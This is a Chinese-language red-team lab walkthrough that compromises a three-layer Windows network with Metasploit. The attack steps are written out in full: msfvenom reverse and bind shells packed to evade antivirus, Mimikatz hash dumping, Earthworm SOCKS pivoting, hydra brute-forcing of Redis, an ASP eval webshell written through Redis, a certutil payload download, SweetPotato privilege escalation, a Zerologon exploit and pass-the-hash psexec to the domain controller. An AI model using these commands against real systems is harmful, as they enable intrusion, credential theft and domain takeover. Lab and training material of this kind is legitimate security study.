安全攻防實戰系列MSF

在紅隊攻防中，我們主要在外網進行資訊收集，透過cms或者其他漏洞拿到shell，之後透過免殺木馬將windows或linux伺服器上線到cobalt strike或msf等c2伺服器，之後對內網進行資訊收集並繪製網路拓撲圖，進行工作組或域滲透，拿到各個網段機器的許可權，遠端登入並截圖證明。

環境配置

從虛擬機器網路來看

機器描述

攻擊機：win10：192。168。1。6kali：192。168。1。10第一層：12server-bt：192。168。1。5192。168。59。133第二層：12server-redis：192。168。59。410。10。10。202第三層：12server-ex13：10。10。10。209第三層：12server-dc：10。10。10。201192。168。59。133 存在殺軟（火絨）， 可通外網， 可訪問server-redis192。168。59。4/10。10。10。202 不通外網，可以通內網兩個機器，也可以訪問到機器server-bt，10。10。10。209 為郵服， 只能內網機器互相訪問10。10。10。201 為 DC

【一>所有資源關注我，私信回覆“資料”獲取<一】

1、200份很多已經買不到的絕版電子書

2、30G安全大廠內部的影片資料

3、100份src文件

4、常見安全面試題

5、ctf大賽經典題目解析

6、全套工具包

7、應急響應筆記

8、網路安全學習路線

目錄如下

第一層 server-bt

蟻劍拿shell

msf免殺拿shell

使用msfvenom生成免殺木馬payload，裡面的IP和埠自行修改，就是反彈shell的kali

msfvenom -p windows/meterpreter/reverse_tcp lhost=192。168。1。10 lport=6666 -e x86/shikata_ga_nai -i 12 -f raw -o msf。bin

使用分離免殺工具生成loader。exe檔案

對生成的exe檔案進行加殼免殺

免殺效果如下

免殺之後透過蟻劍上傳到server-bt上

msf開啟監聽

msfconsoleuse exploit/multi/handlerset payload windows/meterpreter/reverse_tcpset LHOST 192。168。1。10set lport 6666run

蟻劍執行

getuid

ps

migrate 476

msf內網滲透

load mimikatz # 載入Mimikatz模組

抓取Hash

meterpreter > mimikatz_command -f samdump：：hashes

hashdump

然後抓到了 hash：

透過解密得到了 administrator 的密碼

route print # 列印路由資訊

對內網進行掃描 arp 存活

run post/windows/gather/arp_scanner rhosts=192。168。59。0/24

配置路由

meterpreter > run autoroute -s 192。168。59。0/24

開啟遠端桌面

run post/windows/manage/enable_rdp

成功開啟了遠端桌面，並且生成了一個txt檔案，這個txt檔案往後可用來關閉遠端桌面，關閉命令

run multi_console_command -r /root/。msf4/loot/xx_default_192。168。1。5_host。windows。cle_xxx5。txt

繞過火絨新增使用者

螞蟻劍或者cs上傳新增使用者。exe

執行檔案

帳號

：hxxxr 密碼：Pxxxxd

遠端登入server-bt

許可權提升

使用psexec。exe可以提升到system許可權

psexec。exe -accepteula -s -i -d cmd。exe

但是桌面還是之前使用者的許可權啟動的

為了完全提權，我們可以在system的cmd裡面輸入taskmgr。exe來啟動任務管理器

在任務管理器裡面我們結束掉之前由之前賬號開啟的桌面程序

然後再新增一個由system許可權下開啟的桌面程序

再點入看現在登入的賬號是

第二層 server-redis

Earthworm穿透

上傳EW（Earthworm）到C：/wwwroot/

伺服器端執行以下命令

execute C：\wwwroot\ew。exe -s ssocksd -l 1090

這裡還需要修改proxychains。conf配置檔案

$ vim /etc/proxychains。confsocks5 192。168。1。5 1090

探測內網網段存活主機

proxychains nmap -sT -Pn -p 80 192。168。59。0/24

192。168。59。4是存活的，我們著重看一下，發現開了80和6379

Redis-getshell

kali環境進行爆破

proxychains hydra -P /usr/xxx/password。lst 192。168。59。4 redis 6379

得到Redis口令：

連線redis

proxychains src/redis-cli -h 192。168。59。4 -a 1xxxxx

備份檔案寫Shell

192。168。59。4：6379>config set dir “C：\\inetpub\\wwwroot” 進入預設目錄192。168。59。4：6379>config set dbfilename “redis。asp” 建立檔案192。168。59。4：6379>set x “<%eval request（\”chopper\“）%>” 寫入webshell192。168。59。4：6379>save 最後儲存

利用過程

代理蟻劍進行連線這個shell

成功連線到server-redis

並檢視許可權

利用蟻劍把SweetPotato。exe（甜土豆）上傳到C：/Redis/或者C：/ProgramData/目錄下

成功進行提權

msf正向免殺木馬拿到shell

Earthworm穿透

掛代理，透過之前上傳的EW（Earthworm）

伺服器端執行以下命令（關掉server-bt的防火牆代理才能生效）

execute C：\wwwroot\ew。exe -s ssocksd -l 1090

這裡還需要修改proxychains。conf配置檔案

$ vim /etc/proxychains。confsocks5 192。168。1。5 1090

msfvenom -p windows/x64/meterpreter/bind_tcp lport=4444 -f raw -o msf1。bin

用msfvenom生成一個正向馬傳進去（因為無法訪問外網，反向出不來），msf正向連線。

使用分離免殺工具生成loader。exe檔案

改名為msf1。exe，進行加殼免殺

免殺效果如下

先把木馬透過螞蟻劍上傳到寶塔（需要進行免殺），火絨未告警

透過redis的shell進行操作，192。168。59。4遠端下載192。168。59。133上的馬

C：\ProgramData\xxxx。exe -i -c “certutil -urlcache -split -f http：//192。168。59。133/msf1。exe msf1。exe

再透過提權工具進行執行

C：\ProgramData\xxxx。exe -i -c “msf1。exe”

也可以直接將木馬上傳到server-redis的C：/Redis/可寫目錄下就不需要免殺了

msf透過代理開啟監聽

proxychains msfconsoleuse exploit/multi/handlerset payload windows/x64/meterpreter/bind_tcpset RHOST 192。168。59。4set lport 4444run

成功獲取伺服器的shell，之後就是各種許可權維持了。建立計劃任務、開機自啟等等都能夠實現。

ps

migrate 3992getuidgetsystemgetuid

新增賬戶和遠端連線同第一層

msf內網滲透

load mimikatz # 載入Mimikatz模組

抓取Hash

meterpreter > mimikatz_command -f samdump：：hashes

hashdump

得到12SERVER-REDIS賬號密碼：

route print # 列印路由資訊

配置路由

meterpreter > run autoroute -s 10。10。10。0/24

run autoroute -p

透過螞蟻劍將nbtscan。exe上傳到server-redis的Redis可讀寫目錄下

探測內網段存活

nbtscan。exe 10。10。10。0/24

ipconfig /all

10。10。10。0/24段的DNS伺服器是10。10。10。201 而在域環境中DNS伺服器就是當前使用的域控制器

新增完路由後可以透過msf訪問所有機器，訪問域控

proxychains curl 10。10。10。201

第三層 server-dc

zerologon（CVE-2020-1472）漏洞復現

這裡已經滿足觸發zerologon的兩個條件，能ping通域控制器，知道域控計算機名，當然最後dump出域內所有hash的時候需要域名

置空域控機器使用者NTLM hash

proxychains python3 cve-2020-1472-exploit。py 12server-dc$ 10。10。10。201

接下來用置空的機器賬戶dump所有hash

（890c這個hash就是”空“的NTML hash）

我們的目標是獲得域內administrator的hash，然後就可以hash傳遞，登陸任意域內機器

proxychains wmiexec。py -hashes ：42e265xxxxxx62387 administrator@10。10。10。201

利用 psexec（PTH）上線server-dc到 MSF：

proxychains msfconsoleuse exploit/windows/smb/psexecset RHOST 10。10。10。201set SMBUser Administratorset SMBPass aad3bxxxxxxxx4ee：42e265xxxxxx962387set SMBDomain xxxxxset payload windows/x64/meterpreter/bind_tcp_rc4set LPORT 4446 run

成功獲取到shell

利用 psexec 上線server-ex13到 MSF：

proxychains msfconsoleuse exploit/windows/smb/psexecset RHOST 10。10。10。209set SMBUser Administratorset SMBPass aad3bxxxxxxxee：42exxxxxxx387set SMBDomain xxxxset payload windows/x64/meterpreter/bind_tcp_rc4set LPORT 4447 run